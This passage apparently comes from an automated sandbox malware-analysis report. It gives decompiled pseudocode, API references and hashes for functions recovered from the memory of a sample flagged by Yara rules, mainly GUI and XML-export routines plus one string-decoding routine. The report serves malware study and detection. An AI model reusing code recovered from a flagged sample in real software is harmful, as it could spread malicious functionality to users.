                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProc
                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                        • API String ID: 145871493-1506664499
                                                                        • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                        • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                        • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                        • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				char* _v16;
                                                                        				char _v20;
                                                                        				signed int* _v24;
                                                                        				char _v28;
                                                                        				void _v284;
                                                                        				char _v540;
                                                                        				char _v1068;
                                                                        				void _v3115;
                                                                        				char _v3116;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t40;
                                                                        				signed int* _t61;
                                                                        				char _t69;
                                                                        				char* _t74;
                                                                        				char* _t75;
                                                                        				intOrPtr* _t76;
                                                                        				signed int _t78;
                                                                        				int _t80;
                                                                        				void* _t83;
                                                                        				void* _t84;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t74 = __eax;
                                                                        				_t35 = strlen(__eax);
                                                                        				_t78 = _t35;
                                                                        				_t36 = _t35 & 0x80000001;
                                                                        				if(_t36 < 0) {
                                                                        					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
                                                                        					_t89 = _t36;
                                                                        				}
                                                                        				if(_t89 != 0 || _t78 <= 0x20) {
                                                                        					return _t36;
                                                                        				} else {
                                                                        					_v3116 = 0;
                                                                        					memset( &_v3115, 0, 0x7ff);
                                                                        					_v8 = _v8 & 0x00000000;
                                                                        					_t61 = _a4 + 4;
                                                                        					_t40 =  *_t61 | 0x00000001;
                                                                        					if(_t78 <= 4) {
                                                                        						L7:
                                                                        						_t79 =  &_v1068;
                                                                        						E004046D7( &_v1068);
                                                                        						if(E004047A0( &_v1068, _t93) != 0) {
                                                                        							_v20 = _v8;
                                                                        							_v16 =  &_v3116;
                                                                        							_v28 = 0x10;
                                                                        							_v24 = _t61;
                                                                        							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
                                                                        								_t80 = _v12;
                                                                        								if(_t80 > 0xff) {
                                                                        									_t80 = 0xff;
                                                                        								}
                                                                        								_v540 = 0;
                                                                        								_v284 = 0;
                                                                        								memcpy( &_v284, _v8, _t80);
                                                                        								_t27 =  &_a8; // 0x407626
                                                                        								_t75 =  &_v540;
                                                                        								 *((char*)(_t84 + _t80 - 0x118)) = 0;
                                                                        								E004060D0(0xff, _t75,  *_t27);
                                                                        								 *((intOrPtr*)( *_a4))(_t75);
                                                                        								LocalFree(_v8);
                                                                        							}
                                                                        						}
                                                                        						return E004047F1( &_v1068);
                                                                        					}
                                                                        					_t76 = _t74 + 5;
                                                                        					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
                                                                        					do {
                                                                        						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
                                                                        						_t40 = _t40 * 0x10ff5;
                                                                        						_t76 = _t76 + 2;
                                                                        						_v8 = _v8 + 1;
                                                                        						_t83 = _t83 - 1;
                                                                        						_t93 = _t83;
                                                                        						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
                                                                        					} while (_t83 != 0);
                                                                        					goto L7;
                                                                        				}
                                                                        			}
                                                                        0x00000000
                                                                        0x00407472

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                        • String ID: &v@
                                                                        • API String ID: 3110682361-3426253984
                                                                        • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                        • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                        • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                        • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				signed int _t34;
                                                                        				char* _t45;
                                                                        				void* _t47;
                                                                        
                                                                        				E00405EFD(_a4, "<item>\r\n");
                                                                        				_t34 = 0;
                                                                        				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                                                        					do {
                                                                        						_v260 = 0;
                                                                        						memset( &_v259, 0, 0xfe);
                                                                        						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
                                                                        						_t45 =  &_v260;
                                                                        						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                                                        						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
                                                                        						E00405EFD(_a4,  *(__edi + 0x54));
                                                                        						_t47 = _t47 + 0x28;
                                                                        						_t34 = _t34 + 1;
                                                                        					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
                                                                        				}
                                                                        				return E00405EFD(_a4, "</item>\r\n");
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        • memset.MSVCRT ref: 004096CB
                                                                          • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                          • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                          • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                        • sprintf.MSVCRT ref: 00409710
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                        • API String ID: 3200591283-2769808009
                                                                        • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                        • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                        • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                        • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040A4C8(void* __eax) {
                                                                        				void* __esi;
                                                                        				void* _t16;
                                                                        				void* _t33;
                                                                        				void* _t38;
                                                                        				void* _t41;
                                                                        
                                                                        				_t41 = __eax;
                                                                        				_t16 = E00401033();
                                                                        				if(_t16 == 0x5cb8) {
                                                                        					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
                                                                        					E00405E2C();
                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
                                                                        					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
                                                                        					E0040A437(_t41);
                                                                        					SetCursor( *0x416b98);
                                                                        					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
                                                                        					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
                                                                        				}
                                                                        				return _t16;
                                                                        			}









                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5
                                                                          • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                          • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518
                                                                          • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                          • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                          • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                          • Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                        • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                        • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                        • String ID:
                                                                        • API String ID: 2210206837-0
                                                                        • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                        • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                        • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                        • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				void _v515;
                                                                        				char _v516;
                                                                        				void* __esi;
                                                                        				void* _t17;
                                                                        				intOrPtr* _t26;
                                                                        				char* _t28;
                                                                        
                                                                        				_t26 = __ecx;
                                                                        				_v260 = 0;
                                                                        				memset( &_v259, 0, 0xfe);
                                                                        				_v516 = 0;
                                                                        				memset( &_v515, 0, 0xfe);
                                                                        				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
                                                                        				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                                                        				_t28 =  &_v260;
                                                                        				E00409018(_t28, _t17);
                                                                        				sprintf( &_v516, "<%s>\r\n", _t28);
                                                                        				return E00405EFD(_a4,  &_v516);
                                                                        			}












                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040988A
                                                                        • memset.MSVCRT ref: 004098A0
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                          • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                          • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                        • sprintf.MSVCRT ref: 004098D7
                                                                        Strings
                                                                        • <%s>, xrefs: 004098D1
                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                        • API String ID: 3202206310-1998499579
                                                                        • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                        • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                        • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                        • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00408572(void* __esi) {
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __esi;
                                                                        				_t9 =  *((intOrPtr*)(__esi + 0x24));
                                                                        				if(_t9 != 0) {
                                                                        					_push(_t9);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t10 =  *((intOrPtr*)(_t19 + 0x34));
                                                                        				if(_t10 != 0) {
                                                                        					_push(_t10);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
                                                                        				if(_t11 != 0) {
                                                                        					_push(_t11);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
                                                                        				if(_t18 != 0) {
                                                                        					_t11 =  *_t18;
                                                                        					if(_t11 != 0) {
                                                                        						_push(_t11);
                                                                        						L004115D6();
                                                                        						 *_t18 = 0;
                                                                        					}
                                                                        					_push(_t18);
                                                                        					L004115D6();
                                                                        				}
                                                                        				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
                                                                        				 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                                        				 *((intOrPtr*)(_t19 + 0x34)) = 0;
                                                                        				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
                                                                        				return _t11;
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                        • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                        • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                        • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E004085D8(intOrPtr* __edi) {
                                                                        				void* __esi;
                                                                        				void** _t7;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t18;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr _t24;
                                                                        
                                                                        				_t18 = __edi;
                                                                        				 *__edi = 0x413320;
                                                                        				E00408572(__edi);
                                                                        				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                                                        				if(_t21 != 0) {
                                                                        					E00406B5B(_t21);
                                                                        					_push(_t21);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                                                        				if(_t22 != 0) {
                                                                        					E00406B5B(_t22);
                                                                        					_push(_t22);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t23 =  *((intOrPtr*)(_t18 + 8));
                                                                        				if(_t23 != 0) {
                                                                        					E00406B5B(_t23);
                                                                        					_push(_t23);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t24 =  *((intOrPtr*)(_t18 + 4));
                                                                        				if(_t24 != 0) {
                                                                        					E00406B5B(_t24);
                                                                        					_push(_t24);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t12 = _t18;
                                                                        				_t7 =  *((intOrPtr*)( *_t12))();
                                                                        				free( *_t7);
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                        • free.MSVCRT(00000000), ref: 00408640
                                                                          • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@$free
                                                                        • String ID:
                                                                        • API String ID: 2241099983-0
                                                                        • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                        • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                        • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                        • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 19%
                                                                        			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
                                                                        				void* __esi;
                                                                        				void* _t11;
                                                                        				void* _t26;
                                                                        				void* _t27;
                                                                        
                                                                        				_t26 = __edx;
                                                                        				_t11 = _a4 - 0x110;
                                                                        				_t27 = __ecx;
                                                                        				if(_t11 == 0) {
                                                                        					E0040E4A4(__ecx, __ecx, __eflags);
                                                                        					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
                                                                        					L5:
                                                                        					return E004015AE(_t27, _a4, _a8, _a12);
                                                                        				}
                                                                        				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
                                                                        					goto L5;
                                                                        				} else {
                                                                        					SetBkMode(_a8, 1);
                                                                        					SetBkColor(_a8, GetSysColor(5));
                                                                        					SetTextColor(_a8, 0xc00000);
                                                                        					return GetSysColorBrush(5);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                          • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                          • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                        • GetSysColor.USER32(00000005), ref: 0040E849
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                        • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                        • String ID:
                                                                        • API String ID: 1869857563-0
                                                                        • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                        • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                        • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                        • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
                                                                        				char _v265;
                                                                        				char _v520;
                                                                        				char _v532;
                                                                        				RECT* _v540;
                                                                        				char _v560;
                                                                        				intOrPtr _v564;
                                                                        				char _v568;
                                                                        				intOrPtr _v572;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				int _t54;
                                                                        				void* _t77;
                                                                        				short _t85;
                                                                        				short _t86;
                                                                        				RECT* _t97;
                                                                        				intOrPtr _t104;
                                                                        
                                                                        				_t93 = __ecx;
                                                                        				_t97 = 0;
                                                                        				_t104 = __ecx;
                                                                        				_v564 = __ecx;
                                                                        				if(_a4 == 0 || _a4 == 1) {
                                                                        					_t85 = _a8;
                                                                        					if(_t85 == 0x9c42) {
                                                                        						_t54 = DestroyWindow( *(_t104 + 0x108));
                                                                        					}
                                                                        					_t114 = _t85 - 0x9c49;
                                                                        					if(_t85 == 0x9c49) {
                                                                        						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
                                                                        					}
                                                                        					_t115 = _t85 - 0x9c59;
                                                                        					if(_t85 == 0x9c59) {
                                                                        						_t54 = E0040AE70(_t97, _t104, _t115);
                                                                        					}
                                                                        					_t116 = _t85 - 0x9c56;
                                                                        					if(_t85 == 0x9c56) {
                                                                        						_t54 = E0040ADB3(_t104, _t116);
                                                                        					}
                                                                        					if(_a8 == 0x9c58) {
                                                                        						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
                                                                        						_t54 = E0040A27F(0, _t93, _t104, 0);
                                                                        					}
                                                                        					if(_a8 == 0x9c44) {
                                                                        						_t54 = E0040AD9D(_t104);
                                                                        					}
                                                                        					if(_a8 == 0x9c43) {
                                                                        						_v532 = 0x413560;
                                                                        						E00401000(_t93,  &_v520, 0x412404);
                                                                        						E00401000(_t93,  &_v265, 0x412440);
                                                                        						_t104 = _v564;
                                                                        						_push( *(_t104 + 0x108));
                                                                        						_push( &_v532);
                                                                        						_t77 = 0x70;
                                                                        						E00401540(_t77);
                                                                        						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                        						_t20 =  &_v540; // 0x413560
                                                                        						_t54 = E0040143D(_t20);
                                                                        						_t97 = 0;
                                                                        					}
                                                                        					_t86 = _a8;
                                                                        					_t122 = _t86 - 0x9c41;
                                                                        					if(_t86 == 0x9c41) {
                                                                        						_t54 = E0040AD38(_t104, _t93, _t122);
                                                                        					}
                                                                        					if(_t86 != 0x9c47) {
                                                                        						L23:
                                                                        						__eflags = _t86 - 0x9c4f;
                                                                        						if(_t86 != 0x9c4f) {
                                                                        							L27:
                                                                        							__eflags = _t86 - 0x9c48;
                                                                        							if(_t86 == 0x9c48) {
                                                                        								_t54 = E0040AC8A(_t104, _t86);
                                                                        							}
                                                                        							__eflags = _t86 - 0x9c45;
                                                                        							if(__eflags == 0) {
                                                                        								_t100 = _t104 + 0x36c;
                                                                        								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
                                                                        								E0040A27F(0, _t93, _t104, __eflags);
                                                                        								_t93 = 1;
                                                                        								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
                                                                        								_t97 = 0;
                                                                        								__eflags = 0;
                                                                        							}
                                                                        							__eflags = _a8 - 0x9c46;
                                                                        							if(__eflags == 0) {
                                                                        								_t54 = E0040B095(_t104, __eflags, _t97);
                                                                        							}
                                                                        							__eflags = _a8 - 0x9c5c;
                                                                        							if(_a8 == 0x9c5c) {
                                                                        								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
                                                                        								__eflags = 0;
                                                                        								E0040A27F(0, _t93, _t104, 0);
                                                                        								E0040A437(_t104);
                                                                        								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
                                                                        							}
                                                                        							__eflags = _a8 - 0x9c4a;
                                                                        							if(__eflags == 0) {
                                                                        								_t54 = E0040B095(_t104, __eflags, 1);
                                                                        							}
                                                                        							__eflags = _a8 - 0x9c4b;
                                                                        							if(_a8 == 0x9c4b) {
                                                                        								_v540 = _t97;
                                                                        								_v560 = 0x412ff4;
                                                                        								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                        								_v568 = 0x412ff4;
                                                                        								_t54 = E0040143D( &_v560);
                                                                        								_t104 = _v572;
                                                                        							}
                                                                        							__eflags = _a8 - 0x9c4c;
                                                                        							if(_a8 == 0x9c4c) {
                                                                        								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
                                                                        							}
                                                                        							__eflags = _a8 - 0x9c4e;
                                                                        							if(_a8 == 0x9c4e) {
                                                                        								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                                        							}
                                                                        							goto L43;
                                                                        						}
                                                                        						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                        						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                                        						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                                        							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
                                                                        							goto L27;
                                                                        						}
                                                                        						_push(0xf000);
                                                                        						_push(0x1000);
                                                                        						goto L21;
                                                                        					} else {
                                                                        						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                                        							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
                                                                        							goto L23;
                                                                        						}
                                                                        						_push(0xf000);
                                                                        						_push(0x2000);
                                                                        						L21:
                                                                        						_push(0xffffffff);
                                                                        						_t54 = E00408654(_t72);
                                                                        						goto L43;
                                                                        					}
                                                                        				} else {
                                                                        					L43:
                                                                        					return _t54;
                                                                        				}
                                                                        			}





















                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 0040B13E
                                                                        • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DestroyFocusInvalidateRectWindow
                                                                        • String ID: `5A
                                                                        • API String ID: 3502187192-343712130
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				struct HDWP__* _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* __ebx;
                                                                        				intOrPtr _t29;
                                                                        				struct HDWP__* _t30;
